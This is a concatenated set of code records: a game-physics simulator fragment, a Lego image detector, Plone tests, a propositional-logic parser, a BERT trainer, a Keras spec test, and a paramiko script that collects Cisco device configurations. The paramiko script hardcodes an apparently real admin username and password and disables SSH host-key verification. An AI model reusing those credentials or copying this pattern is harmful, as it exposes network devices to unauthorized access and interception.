wall\n                being_blocked = False\n                for ceiling in obstacles:  # nothing blocking the top right corner\n                    if ceiling.left_x < obs.right_x 
< ceiling.right_x and obs.top_y < ceiling.bot_y < my_y:\n being_blocked = True\n break\n if not being_blocked:\n index = i\n if index == -1:\n index = 2\n left_up = (obstacles[index].right_x, obstacles[index].top_y)\n\n # move right until fall or wall\n index = -1\n for i, obs in enumerate(obstacles):\n if my_x < obs.left_x <= ground.right_x and obs.top_y < my_y < ground.top_y <= obs.bot_y:\n if index == -1 or obs.left_x < obstacles[index].left_x:\n index = i\n if index == -1: # no walls found, there must be something below\n fallZoneRight = getObstacleBelowPoint(ground.right_x, ground.top_y, obstacles)\n right_down = (ground.right_x, fallZoneRight.top_y)\n else:\n right_down = (obstacles[index].left_x, ground.top_y)\n\n index = -1\n for i, obs in enumerate(obstacles):\n if my_x < obs.left_x and obs.top_y < my_y: # wall to the right\n if index == -1 or obs.left_x < obstacles[index].left_x: # closest wall\n being_blocked = False\n for ceiling in obstacles: # nothing blocking the top left corner\n if ceiling.left_x < obs.left_x < ceiling.right_x and obs.top_y < ceiling.bot_y < my_y:\n being_blocked = True\n break\n if not being_blocked:\n index = i\n if index == -1:\n index = 3\n right_up = (obstacles[index].left_x, obstacles[index].top_y)\n\n return ground, ceil, left_down, left_up, right_down, right_up\n","sub_path":"PursuitDDQN/src/simulator/GymGF2.py","file_name":"GymGF2.py","file_ext":"py","file_size_in_byte":30916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
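A small sketch of the Obstacle helpers from GymGF2.py above; coordinates follow the file's convention that y grows downward (top_y < bot_y), and the import path is an assumption based on the module layout:

from simulator.GymGF2 import Obstacle, getObstacleBelowPoint, getObstacleAbovePoint

floor = Obstacle(640, 780, 640, 20)      # spans x 0..1280, y 760..800
ceiling = Obstacle(640, 20, 640, 20)     # spans x 0..1280, y 0..40
ledge = Obstacle(300, 500, 100, 10)      # platform at x 200..400, y 490..510
obstacles = [floor, ceiling, ledge]      # index 0 = default ground, 1 = default ceiling

print(getObstacleBelowPoint(300, 400, obstacles))   # -> the ledge, *(200,490):(400,510)*
print(getObstacleBelowPoint(1000, 400, obstacles))  # -> the floor, *(0,760):(1280,800)*
print(getObstacleAbovePoint(300, 400, obstacles))   # -> the ceiling, *(0,0):(1280,40)*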
+{"seq_id":"421982085","text":"import os\nimport threading\nimport time\nimport numpy as np\nimport tensorflow as tf\nimport logging\nfrom pathlib import Path\n\nfrom lego_sorter_server.analysis.detection import DetectionUtils\nfrom lego_sorter_server.analysis.detection.DetectionResults import DetectionResults\nfrom lego_sorter_server.analysis.detection.DetectionUtils import crop_with_margin\n\nfrom lego_sorter_server.analysis.detection.detectors.LegoDetector import LegoDetector\n\n\nclass ThreadSafeSingleton(type):\n _instances = {}\n _singleton_lock = threading.Lock()\n\n def __call__(cls, *args, **kwargs):\n if cls not in cls._instances:\n with cls._singleton_lock:\n if cls not in cls._instances:\n cls._instances[cls] = super(ThreadSafeSingleton, cls).__call__(*args, **kwargs)\n return cls._instances[cls]\n\n\nclass TFLegoDetector(LegoDetector, metaclass=ThreadSafeSingleton):\n\n def __init__(self, model_path=os.path.join(\"lego_sorter_server\", \"analysis\", \"detection\", \"models\", \"tf_model\",\n \"saved_model\")):\n self.__initialized = False\n self.model_path = Path(model_path).absolute()\n\n @staticmethod\n def prepare_input_tensor(image):\n input_tensor = tf.convert_to_tensor(image)\n input_tensor = input_tensor[tf.newaxis, ...]\n return input_tensor\n\n def __initialize__(self):\n if self.__initialized:\n raise Exception(\"TFLegoDetector already initialized\")\n\n if not self.model_path.exists():\n logging.error(f\"[TFLegoDetector] No model found in {str(self.model_path)}\")\n raise RuntimeError(f\"[TFLegoDetector] No model found in {str(self.model_path)}\")\n\n start_time = time.time()\n self.model = tf.saved_model.load(str(self.model_path))\n elapsed_time = time.time() - start_time\n\n logging.info(\"Loading model took {} seconds\".format(elapsed_time))\n self.__initialized = True\n\n def detect_lego(self, image: np.array) -> DetectionResults:\n if not self.__initialized:\n logging.info(\"TFLegoDetector is not initialized, this process can take a few seconds for the first time.\")\n self.__initialize__()\n\n input_tensor = self.prepare_input_tensor(image)\n detections = self.model(input_tensor)\n num_detections = int(detections.pop('num_detections'))\n detections = {key: value[0, :num_detections].numpy() for key, value in detections.items()}\n detections['num_detections'] = num_detections\n # detection_classes should be ints.\n detections['detection_classes'] = detections['detection_classes'].astype(np.int64)\n\n detections = self.discard_results_under_threshold(detections)\n\n return DetectionResults.from_dict(detections)\n\n def detect_and_crop(self, image):\n width, height = image.size\n image_resized, scale = DetectionUtils.resize(image, 640)\n detections = self.detect_lego(np.array(image_resized))\n detected_counter = 0\n new_images = []\n for i in range(100):\n if detections.detection_scores[i] < 0.5:\n break # IF SORTED\n\n detected_counter += 1\n ymin, xmin, ymax, xmax = [int(i * 640 * 1 / scale) for i in detections.detection_boxes[i]]\n\n # if bb is out of bounds\n if ymax >= height or xmax >= width:\n continue\n\n new_images += [crop_with_margin(image, ymin, xmin, ymax, xmax)]\n\n return new_images\n\n @staticmethod\n def discard_results_under_threshold(detections, threshold=0.1):\n limit = 1\n\n for index, score in enumerate(detections['detection_scores']):\n if score < threshold:\n limit = index\n break\n\n return {\n \"detection_scores\": detections[\"detection_scores\"][:limit],\n \"detection_classes\": detections[\"detection_classes\"][:limit],\n 
\"detection_boxes\": detections[\"detection_boxes\"][:limit]\n }\n","sub_path":"lego_sorter_server/analysis/detection/detectors/TFLegoDetector.py","file_name":"TFLegoDetector.py","file_ext":"py","file_size_in_byte":4030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"161154122","text":"import os, sys\nif __name__ == '__main__':\n execfile(os.path.join(sys.path[0], 'framework.py'))\n\nfrom Products.PloneTestCase import PloneTestCase\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.DiPP.config import PID, label, address, port\n\nPloneTestCase.installProduct('ATVocabularyManager')\nPloneTestCase.installProduct('CMFOpenflow')\nPloneTestCase.installProduct('DiPPContent')\nPloneTestCase.installProduct('LinguaPlone')\nPloneTestCase.installProduct('PloneLanguageTool')\nPloneTestCase.installProduct('TextIndexNG3')\nPloneTestCase.installProduct('DiPP')\nPloneTestCase.setupPloneSite(products=('DiPP',))\n\n\nclass TestMetadata(PloneTestCase.PloneTestCase):\n\n PID = PID\n label = label\n address = address\n port = port\n \n def afterSetUp(self):\n #self.portal.manage_addProduct['DiPP'].manage_addTool('Fedora2DiPP3')\n self.tool = getToolByName(self.portal, 'fedora')\n self.typestool = getToolByName(self.portal, 'portal_types')\n \n def testSetFedoraPID(self):\n self.setRoles(['Manager'])\n self.tool.manage_setFedoraSettings(self.PID, None, None, None, None)\n self.assertEquals(self.tool.PID, self.PID)\n \n def testSetFedoraLabel(self):\n self.setRoles(['Manager'])\n self.tool.manage_setFedoraSettings(None, self.label, None, None, None)\n self.assertEquals(self.tool.label, self.label)\n\n def testSetFedoraAddress(self):\n self.setRoles(['Manager'])\n self.tool.manage_setFedoraSettings(None, None, self.address, None, None)\n self.assertEquals(self.tool.address, self.address)\n\n def testSetFedoraPort(self):\n self.setRoles(['Manager'])\n self.tool.manage_setFedoraSettings(None, None, None, self.port, None)\n self.assertEquals(self.tool.port, self.port)\n\ndef test_suite():\n from unittest import TestSuite, makeSuite\n suite = TestSuite()\n suite.addTest(makeSuite(TestMetadata))\n return suite\n\nif __name__ == '__main__':\n framework()\n","sub_path":"Products/DiPP/tests/test_tool.py","file_name":"test_tool.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"524115904","text":"\"\"\"Istinitosna vrijednost, i jednostavna optimizacija, formula logike sudova.\n\nStandardna definicija iz [Vuković, Matematička logika]:\n* Propozicijska varijabla (P0, P1, P2, ..., P9, P10, P11, ....) je formula\n* Ako je F formula, tada je i !F formula (negacija)\n* Ako su F i G formule, tada su i (F&G), (F|G), (F->G) i (F<->G) formule\nSve zagrade (oko binarnih veznika) su obavezne!\n\nInterpretacija se zadaje imenovanim argumentima (**interpretacija):\n formula.vrijednost(P2=True, P7=False, P1=True, ...)\n\nOptimizacija (formula.optim()) zamjenjuje potformule oblika !!F sa F.\n\"\"\"\n\n\nfrom pj import *\n\n\nclass LS(enum.Enum):\n NEG, KONJ, DISJ, OTV, ZATV = '!&|()'\n KOND, BIKOND = '->', '<->'\n class PVAR(Token):\n def vrijednost(self, **interpretacija):\n return pogledaj(interpretacija, self)\n def optim(self): return self\n\n\ndef ls_lex(kôd):\n lex = Tokenizer(kôd)\n for znak in iter(lex.čitaj, ''):\n if znak == 'P':\n prvo = lex.čitaj()\n if not prvo.isdigit(): lex.greška('očekivana znamenka')\n if prvo != '0': lex.zvijezda(str.isdigit)\n yield lex.token(LS.PVAR)\n elif znak == '-':\n lex.pročitaj('>')\n yield lex.token(LS.KOND)\n elif znak == '<':\n lex.pročitaj('-'), lex.pročitaj('>')\n yield lex.token(LS.BIKOND)\n else: yield lex.literal(LS)\n\n\n### Beskontekstna gramatika:\n# formula -> NEG formula | PVAR | OTV formula binvez formula ZATV\n# binvez -> KONJ | DISJ | KOND | BIKOND\n\n\n### Apstraktna sintaksna stabla (i njihovi atributi):\n# PVAR (Token, odozgo): tip, sadržaj\n# Negacija: ispod\n# Binarna: veznik lijevo desno\n\n\nclass LSParser(Parser):\n def formula(self):\n if self >> LS.PVAR: return self.zadnji\n elif self >> LS.NEG: \n ispod = self.formula()\n return Negacija(ispod)\n elif self >> LS.OTV:\n lijevo = self.formula()\n veznik = self.pročitaj(LS.KONJ, LS.DISJ, LS.KOND, LS.BIKOND)\n desno = self.formula()\n self.pročitaj(LS.ZATV)\n return Binarna(veznik, lijevo, desno)\n else: raise self.greška()\n\n start = formula\n\n\nclass Negacija(AST('ispod')):\n def vrijednost(formula, **interpretacija):\n return not formula.ispod.vrijednost(**interpretacija)\n\n def optim(self):\n ispod_opt = self.ispod.optim()\n if ispod_opt ^ Negacija: return ispod_opt.ispod \n else: return Negacija(ispod_opt)\n\n\nclass Binarna(AST('veznik lijevo desno')):\n def vrijednost(formula, **interpretacija):\n v = formula.veznik\n l = formula.lijevo.vrijednost(**interpretacija)\n d = formula.desno.vrijednost(**interpretacija)\n if v ^ LS.DISJ: return l or d\n elif v ^ LS.KONJ: return l and d\n elif v ^ LS.KOND: return l <= d\n elif v ^ LS.BIKOND: return l == d\n else: assert False, 'nepokriveni slučaj'\n\n def optim(self):\n lijevo_opt = self.lijevo.optim()\n desno_opt = self.desno.optim()\n return Binarna(self.veznik, lijevo_opt, desno_opt)\n\n\nif __name__ == '__main__':\n ulaz = '!(P5&!!(P3->P0))'\n print(ulaz)\n\n tokeni = list(ls_lex(ulaz))\n print(*tokeni)\n # NEG'!' OTV'(' PVAR'P5' KONJ'&' NEG'!' 
NEG'!'\n # OTV'(' PVAR'P3' KOND'->' PVAR'P0' ZATV')' ZATV')'\n\n fo = LSParser.parsiraj(tokeni)\n print(fo)\n # Negacija(\n # ispod=Binarna(\n # veznik=KONJ'&',\n # lijevo=PVAR'P5',\n # desno=Negacija(\n # ispod=Negacija(\n # ispod=Binarna(\n # veznik=KOND'->',\n # lijevo=PVAR'P3',\n # desno=PVAR'P0'\n # )\n # )\n # )\n # )\n # )\n \n fo = fo.optim()\n print(fo)\n # Negacija(\n # ispod=Binarna(\n # veznik=KONJ'&',\n # lijevo=PVAR'P5',\n # desno=Binarna(\n # veznik=KOND'->',\n # lijevo=PVAR'P3',\n # desno=PVAR'P0'\n # )\n # )\n # )\n \n print(fo.vrijednost(P0=False, P3=True, P5=False))\n # True\n\n# DZ: implementirajte još neke optimizacije: npr. F|!G u G->F.\n# DZ: Napravite totalnu optimizaciju negacije: svaka formula s najviše jednim !\n# (Za ovo bi vjerojatno bilo puno lakše imati po jedno AST za svaki veznik.)\n","sub_path":"PJ/01_logika_sudova.py","file_name":"01_logika_sudova.py","file_ext":"py","file_size_in_byte":4279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"120107246","text":"import paramiko\nimport csv\nimport re\nimport os\nimport logging\nimport socket\nimport pandas\n\n\n# Function to stablish SSH session to device and execute a command or set of commands received from the main function\ndef connect_to_device(ip_address, username, password, command_to_run):\n print(\"\\n------------------------------------------------------\")\n print(\"--- Attempting paramiko connection to: \", ip_address)\n\n try:\n # Create paramiko session\n ssh_client = paramiko.SSHClient()\n\n # Must set missing host key policy since we don't have the SSH key stored in the 'known_hosts' file\n ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n # Make the connection to our host.\n ssh_client.connect(hostname=ip_address,\n username=username,\n password=password)\n\n # If there is an issue, paramiko will throw an exception, so the SSH request must have succeeded.\n print(\"--- Success! connecting to: \", ip_address)\n except paramiko.AuthenticationException:\n logger.debug(\"Authentication failed, please verify your credentials: %s\")\n except socket.error as strerror:\n logger.debug(\"TCP Error connection: %s\" % strerror)\n except paramiko.SSHException as strerror:\n logger.debug(\"Unable to establish SSH connection: %s\" + strerror)\n\n try:\n # Runs the command received from the function call\n stdin, stdout, stderr = ssh_client.exec_command(command_to_run)\n command_result = stdout.readlines()\n except paramiko.SSHException as strerror:\n logger.debug(\"SSH Error - %s \" + strerror)\n\n # Returns the output of the command received\n return command_result\n\n\ndef main():\n # Read list of ips to connect from CSV file and skips the first row\n logger.debug(\"Getting list of devices from CSV File\")\n host_list = open(r\"C:\\Users\\jjimenez\\Documents\\GitHub\\Cisco\\Devices.csv\", \"rt\")\n read_file = csv.reader(host_list)\n next(read_file)\n\n counter = 1\n device_dictionary = {}\n current_path = os.getcwd()\n\n # Loops the content of the of the CSV file and performs the operations \"show run\" and \"show version\"\n for row in read_file:\n row_str = ' '.join(row)\n\n # Get hostname from list and leave only the name from the list\n logger.debug(\"Connecting to Device \" + row_str + \"to get hostname\")\n hostname = connect_to_device(row_str, \"crgadmin\", \"CRG3mpow3rs@dm1n\", \"show run | inc hostname\")\n\n for hn in hostname:\n if \"hostname\" in hn:\n str_hostname = hn\n break\n\n logger.debug(\"Device hostname = \" + str_hostname)\n str_hostname = str_hostname[9:-2]\n dir_name = str_hostname\n str_hostname = str_hostname.rstrip() + \".txt\"\n\n # To get the output of show run and save to a file\n logger.debug(\"Connecting to Device \" + row_str + \"to get output of show run\")\n show_run_output = connect_to_device(row_str, \"crgadmin\", \"CRG3mpow3rs@dm1n\", \"sh run\")\n os.mkdir(current_path + \"\\\\outputs\\\\Devices\\\\\" + dir_name)\n os.mkdir(current_path + \"\\\\outputs\\\\Devices\\\\\" + dir_name + \"\\\\run\")\n file_path = current_path + \"\\\\outputs\\\\Devices\\\\\" + dir_name + \"\\\\run\\\\sh_run_\" + str_hostname\n try:\n my_output_file = open(file_path, \"w\")\n my_output_file.writelines(show_run_output)\n my_output_file.close()\n logger.debug(\"Writing show run to txt file\")\n except IOError as strerror:\n logger.debug(\"Error creating File %s \" + strerror)\n\n # To get the output of show version and save to a file\n logger.debug(\"Connecting to Device \" + row_str + \"to get output of show version\")\n 
show_ver_output = connect_to_device(row_str, \"crgadmin\", \"CRG3mpow3rs@dm1n\", \"sh version\")\n os.mkdir(current_path + \"\\\\outputs\\\\Devices\\\\\" + dir_name + \"\\\\version\")\n file_path = current_path + \"\\\\outputs\\\\Devices\\\\\" + dir_name + \"\\\\version\\\\sh_ver_\" + str_hostname\n try:\n my_output_file = open(file_path, \"w\")\n my_output_file.writelines(show_ver_output)\n my_output_file.close()\n except IOError as strerror:\n logger.debug(\"Error creating File %s \" + strerror)\n\n # Get the IOS version from the show run\n logger.debug(\"Converting output of show version to string to find IOS version on the string\")\n show_ver_str = ' '.join(show_ver_output)\n version_pattern = re.compile(\"Version ([0-9]*\\.[0-9][\\(\\)0-9a-zA-Z]*)\")\n device_ios_version = re.search(version_pattern, show_ver_str).group(1)\n\n # Write information to different arrays so then it can be written into a CSV file\n logger.debug(\"Writing device hostname, IP and IOS to a Python Directory\")\n str_hostname = str_hostname[:-4]\n str_counter = str(counter)\n str_ip = ' '.join(row)\n device_dictionary[str_counter] = {\"hostname\": str_hostname, \"IP\": str_ip, \"IOS\": device_ios_version}\n counter = counter + 1\n\n # To write hostname,ip,ios to a CSV file for audit/report\n logger.debug(\"About to python directory containing device information to csv file\")\n csv_file = current_path + \"\\\\outputs\\\\Device_Info.csv\"\n try:\n pandas.DataFrame.from_dict(device_dictionary,orient=\"index\").to_csv(csv_file)\n except csv.Error as strerror:\n logger.debug(\"Error creating File %s \" + strerror)\n\n\nif __name__ == '__main__':\n # Setting up loggin\n logging.basicConfig(level=logging.DEBUG)\n logger = logging.getLogger(__name__)\n\n handler = logging.FileHandler('process.log')\n handler.setLevel(logging.DEBUG)\n\n # create a logging format\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n handler.setFormatter(formatter)\n\n # add the handlers to the logger\n logger.addHandler(handler)\n main()\n","sub_path":"DeviceInfo.py","file_name":"DeviceInfo.py","file_ext":"py","file_size_in_byte":5945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
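The IOS-version regex in main() above is easiest to see in isolation. A sketch with a made-up banner line (the pattern itself is the one compiled in the record):

import re

version_pattern = re.compile(r"Version ([0-9]*\.[0-9][\(\)0-9a-zA-Z]*)")
banner = "Cisco IOS Software, C2960 Software, Version 15.0(2)SE11, RELEASE SOFTWARE"
print(re.search(version_pattern, banner).group(1))  # -> 15.0(2)SE11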
+{"seq_id":"652937795","text":"# coding=utf-8\n# created by Ge Zhang, Jan 20, 2020\n#\n# annotation test file\n\n\nimport torch\nimport torch.nn as nn\nfrom torch.optim import Adam, SGD\nfrom torch.utils.data import DataLoader\nimport torch.nn.functional as F\nfrom model import BERTLM, BERT, VAE, TempVAE\nfrom .optim_schedule import ScheduledOptim\n\nimport tqdm\nimport pdb\ntorch.manual_seed(0)\n\n\ndef my_loss(reconstructed_pos, origin_pos, origin_neg):\n duplicate = int(origin_neg.shape[0] / reconstructed_pos.shape[0])\n # if duplicate != 5:\n # pdb.set_trace()\n # assert duplicate == 5\n hid_size = origin_neg.shape[-1]\n # print(duplicate)\n pos_sim = torch.bmm(reconstructed_pos.unsqueeze(\n 1), origin_pos.unsqueeze(2)).repeat(1, duplicate, 1).view(-1)\n neg_sim = torch.bmm(reconstructed_pos.repeat(\n 1, duplicate).view(-1, hid_size).unsqueeze(1), origin_neg.unsqueeze(2)).view(-1)\n diff = neg_sim - pos_sim + 1\n # pdb.set_trace()\n diff = torch.max(diff, torch.zeros_like(diff))\n loss = torch.sum(diff)\n return loss\n\n\nclass TempTrainer:\n \"\"\"\n BERTTrainer make the pretrained BERT model with two LM training method.\n\n 1. Masked Language Model : 3.3.1 Task #1: Masked LM\n 2. Next Sentence prediction : 3.3.2 Task #2: Next Sentence Prediction\n\n please check the details on README.md with simple example.\n\n \"\"\"\n\n def __init__(self, bert: BERT, vocab_size: int,\n train_dataloader: DataLoader, test_dataloader: DataLoader,\n lr: float = 1e-4, betas=(0.9, 0.999), weight_decay: float = 0.01, warmup_steps=10000,\n with_cuda: bool = True, cuda_devices=None, log_freq: int = 10, pad_index=0, loss_lambda=1, model_path=None, n_topics=50, weak_supervise=False, context=False, markdown=False, hinge_loss_start_point=20, entropy_start_point=30):\n \"\"\"\n :param bert: BERT model which you want to train\n :param vocab_size: total word vocab size\n :param train_dataloader: train dataset data loader\n :param test_dataloader: test dataset data loader [can be None]\n :param lr: learning rate of optimizer\n :param betas: Adam optimizer betas\n :param weight_decay: Adam optimizer weight decay param\n :param with_cuda: traning with cuda\n :param log_freq: logging frequency of the batch iteration\n :param context: use information from neighbor cells\n \"\"\"\n\n # Setup cuda device for BERT training, argument -c, --cuda should be true\n self.loss_lambda = loss_lambda\n self.n_topics = n_topics\n self.weak_supervise = weak_supervise\n self.context = context\n self.markdown = markdown\n self.hinge_loss_start_point = hinge_loss_start_point\n self.entropy_start_point = entropy_start_point\n cuda_condition = torch.cuda.is_available() and with_cuda\n\n self.device = torch.device(\"cuda:0\" if cuda_condition else \"cpu\")\n\n # This BERT model will be saved every epoch\n self.bert = bert\n # Initialize the BERT Language Model, with BERT model\n self.model = TempVAE(bert, vocab_size, n_topics=n_topics,\n weak_supervise=weak_supervise, context=context, markdown=markdown).to(self.device)\n # pdb.set_trace()\n print(model_path)\n if model_path:\n self.model.load_state_dict(\n torch.load(model_path)[\"model_state_dict\"])\n\n # Distributed GPU training if CUDA can detect more than 1 GPU\n if with_cuda and torch.cuda.device_count() > 1:\n # pdb.set_trace()\n print(\"Using %d GPUS for BERT\" % torch.cuda.device_count())\n self.model = nn.DataParallel(self.model, device_ids=cuda_devices)\n # pdb.set_trace()\n # Setting the train and test data loader\n self.train_data = train_dataloader\n self.test_data = 
test_dataloader\n\n self.pad_index = pad_index\n # Setting the Adam optimizer with hyper-param\n # self.optim = Adam(self.model.parameters(), lr=lr,\n # betas=betas, weight_decay=weight_decay)\n # self.optim_schedule = ScheduledOptim(\n # self.optim, self.bert.hidden, n_warmup_steps=warmup_steps)\n self.optim = SGD(self.model.parameters(), lr=lr, momentum=0.9)\n # Using Negative Log Likelihood Loss function for predicting the masked_token\n # self.criterion = nn.NLLLoss(ignore_index=self.pad_index)\n self.best_loss = None\n self.updated = False\n self.log_freq = log_freq\n self.cross_entropy = nn.CrossEntropyLoss(ignore_index=0)\n\n print(\"Total Parameters:\", sum([p.nelement()\n for p in self.model.parameters()]))\n\n def train(self, epoch):\n self.model.train()\n # self.optim.zero_grad()\n return self.iteration(epoch, self.train_data)\n\n def test(self, epoch):\n self.model.eval()\n with torch.no_grad():\n loss = self.iteration(epoch, self.test_data, train=False)\n return loss\n\n def api(self, data_loader=None):\n self.model.eval()\n # str_code = \"train\" if train else \"test\"\n if not data_loader:\n data_loader = self.test_data\n\n # Setting the tqdm progress bar\n data_iter = tqdm.tqdm(enumerate(data_loader),\n # desc=\"EP_%s:%d\" % (str_code, epoch),\n total=len(data_loader),\n bar_format=\"{l_bar}{r_bar}\")\n\n avg_loss = 0.0\n total_correct = 0\n total_element = 0\n\n # for (i, data), (ni, ndata) in data_iter, neg_data_iter:\n phases = []\n stages = []\n stage_vecs = []\n with torch.no_grad():\n for i, item in data_iter:\n data = item[0]\n ndata = item[1]\n\n # 0. batch_data will be sent into the device (GPU or CPU)\n data = {key: value.to(self.device)\n for key, value in data.items()}\n ndata = {key: value.to(self.device)\n for key, value in ndata.items()}\n # pdb.set_trace()\n # 1. forward the next_sentence_prediction and masked_lm model\n # pdb.set_trace()\n reconstructed_vec, graph_vec, origin_neg, topic_dist, stage_vec = self.model.forward(\n data[\"bert_input\"], ndata[\"bert_input\"], data[\"segment_label\"], ndata[\"segment_label\"], data[\"adj_mat\"], ndata[\"adj_mat\"], train=False)\n # data_loader.dataset.update_topic_dist(topic_dist, data[\"id\"])\n\n # phases += torch.max(topic_dist, 1)[-1].tolist()\n # print(torch.max(stage_vec, 1)[-1].tolist())\n stages += torch.max(stage_vec, 1)[-1].tolist()\n stage_vecs += stage_vec.tolist()\n # pdb.set_trace()\n return stages, stage_vecs\n\n def iteration(self, epoch, data_loader, train=True):\n \"\"\"\n loop over the data_loader for training or testing\n if on train status, backward operation is activated\n and also auto save the model every epoch\n\n :param epoch: current epoch index\n :param data_loader: torch.utils.data.DataLoader for iteration\n :param train: boolean flag: train or test\n :return: average loss over the data_loader\n \"\"\"\n str_code = \"train\" if train else \"test\"\n\n # Setting the tqdm progress bar\n data_iter = tqdm.tqdm(enumerate(data_loader),\n desc=\"EP_%s:%d\" % (str_code, epoch),\n total=len(data_loader),\n bar_format=\"{l_bar}{r_bar}\")\n\n avg_loss = 0.0\n total_correct = 0\n\n # def calculate_iter(data):\n\n for i, item in data_iter:\n # if train:\n # self.optim.zero_grad()\n data = item[0]\n ndata = item[1]\n\n data = {key: value.to(self.device) for key, value in data.items()}\n ndata = {key: value.to(self.device)\n for key, value in ndata.items()}\n # pdb.set_trace()\n\n reconstructed_vec, graph_vec, origin_neg, topic_dist, stage_vec = self.model.forward(\n data[\"bert_input\"], ndata[\"bert_input\"], data[\"segment_label\"], ndata[\"segment_label\"], data[\"adj_mat\"], ndata[\"adj_mat\"], train=train)\n\n bs, _ = reconstructed_vec.shape\n nbs, _ = origin_neg.shape\n duplicate = int(nbs / bs)\n\n hinge_loss = my_loss(reconstructed_vec, graph_vec, origin_neg)\n weight_loss = torch.norm(torch.mm(\n self.model.reconstruction.weight.T, self.model.reconstruction.weight) - torch.eye(self.n_topics).cuda())\n c_entropy = self.cross_entropy(stage_vec, data['stage'])\n entropy = -1 * (F.softmax(stage_vec, dim=1) *\n F.log_softmax(stage_vec, dim=1)).sum()\n # raise NotImplementedError\n if epoch < self.hinge_loss_start_point:\n loss = c_entropy\n # else:\n elif epoch < self.entropy_start_point:\n loss = c_entropy + self.loss_lambda * weight_loss + hinge_loss\n else:\n loss = c_entropy + entropy + self.loss_lambda * weight_loss + hinge_loss\n # loss = self.loss_lambda * weight_loss + hinge_loss\n if epoch == self.hinge_loss_start_point:\n self.optim = SGD(self.model.parameters(),\n lr=0.00001, momentum=0.9)\n\n # pdb.set_trace()\n\n # 3. 
backward and optimization only in train\n\n if train:\n self.optim.zero_grad()\n loss.backward()\n # self.optim.step_and_update_lr()\n self.optim.step()\n\n avg_loss += loss.item()\n\n post_fix = {\n \"epoch\": epoch,\n \"iter\": i,\n \"avg_loss\": avg_loss / (i + 1),\n # \"avg_acc\": total_correct / total_element * 100,\n \"loss\": loss.item(),\n \"cross_entropy\": c_entropy.item(),\n \"entropy\": entropy.item(),\n \"hinge_loss\": hinge_loss.item()\n }\n\n if i % self.log_freq == 0:\n data_iter.write(str(post_fix))\n\n print(\"EP%d_%s, avg_loss=\" %\n (epoch, str_code), avg_loss / len(data_iter))\n return avg_loss / len(data_iter)\n\n def save(self, epoch, file_path=\"output/bert_trained.model\"):\n \"\"\"\n Saving the current BERT model on file_path\n\n :param epoch: current epoch number\n :param file_path: model output path; the saved file will be file_path + \".ep%d\" % epoch\n :return: final_output_path\n \"\"\"\n output_path = file_path + \".ep%d\" % epoch\n # if self.updated:\n # return output_path\n # torch.save(self.bert.cpu(), output_path)\n torch.save({\n 'epoch': epoch,\n 'model_state_dict': self.model.state_dict()\n # 'optimizer_state_dict': optimizer.state_dict(),\n # 'loss': loss,\n # ...\n }, output_path)\n # self.bert.to(self.device)\n print(\"EP:%d Model Saved on:\" % epoch, output_path)\n # self.updated = True\n return output_path\n","sub_path":"bert_pytorch/trainer/markdown_test.py","file_name":"markdown_test.py","file_ext":"py","file_size_in_byte":11573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
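The my_loss function in markdown_test.py above is a margin-ranking ("hinge") loss: sum(max(0, neg_sim - pos_sim + 1)). A tiny numeric sketch of the same formula (the similarity values are invented for illustration):

import torch

pos_sim = torch.tensor([0.9, 0.2])  # similarities to the positive samples
neg_sim = torch.tensor([0.1, 0.5])  # similarities to the negative samples
# margin of 1: a pair contributes only if the negative is not at least 1 below the positive
loss = torch.clamp(neg_sim - pos_sim + 1.0, min=0.0).sum()
print(loss)  # tensor(1.5000) = 0.2 + 1.3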
+{"seq_id":"245124237","text":"import keras\nimport keras_model_specs.model_spec as model_spec\n\n\nfrom keras_model_specs import ModelSpec\nfrom keras_applications.mobilenet import MobileNet\n\n\ndef assert_lists_same_items(list1, list2):\n assert sorted(list1) == sorted(list2)\n\n\ndef test_has_all_base_specs():\n assert_lists_same_items(model_spec.BASE_SPEC_NAMES, model_spec.BASE_SPECS.keys())\n\n for name in model_spec.BASE_SPEC_NAMES:\n spec = ModelSpec.get(name)\n assert spec is not None\n assert spec.name == name\n assert spec.model is not None\n assert spec.target_size is not None\n assert spec.preprocess_func is not None\n assert spec.preprocess_input is not None\n assert spec.keras_kwargs == {'backend': keras.backend,\n 'layers': keras.layers,\n 'models': keras.models,\n 'utils': keras.utils}\n\n\ndef test_as_json_mobilenet_v1():\n spec = ModelSpec.get('mobilenet_v1')\n expected = {\n 'name': 'mobilenet_v1',\n 'model': 'keras_applications.mobilenet.MobileNet',\n 'preprocess_args': None,\n 'preprocess_func': 'between_plus_minus_1',\n 'target_size': [224, 224, 3]\n }\n assert spec.as_json() == expected\n\n\ndef test_returns_none_for_nonexistent_and_spec():\n spec = ModelSpec.get('nonexistent_v1')\n assert spec is None\n\n\ndef test_returns_nonexistent_with_overrides():\n spec = ModelSpec.get(\n 'nonexistent_v1',\n model='keras_applications.mobilenet.MobileNet',\n target_size=[224, 224, 3],\n preprocess_func='mean_subtraction',\n preprocess_args=[1, 2, 3]\n )\n assert spec is not None\n assert spec.model == MobileNet\n assert spec.target_size == [224, 224, 3]\n assert spec.preprocess_func == 'mean_subtraction'\n assert spec.preprocess_args == [1, 2, 3]\n assert spec.preprocess_input is not None\n assert spec.keras_kwargs == {'backend': keras.backend,\n 'layers': keras.layers,\n 'models': keras.models,\n 'utils': keras.utils}\n\n\ndef test_returns_existing_with_overrides():\n spec = ModelSpec.get(\n 'mobilenet_v1',\n model='keras_applications.mobilenet.MobileNet',\n target_size=[512, 512, 3],\n preprocess_func='mean_subtraction',\n preprocess_args=[1, 2, 3]\n )\n assert spec is not None\n assert spec.model == MobileNet\n assert spec.target_size == [512, 512, 3]\n assert spec.preprocess_func == 'mean_subtraction'\n assert spec.preprocess_args == [1, 2, 3]\n assert spec.preprocess_input is not None\n assert spec.keras_kwargs == {'backend': keras.backend,\n 'layers': keras.layers,\n 'models': keras.models,\n 'utils': keras.utils}\n\n\ndef test_load_image_for_all_base_specs():\n for name in 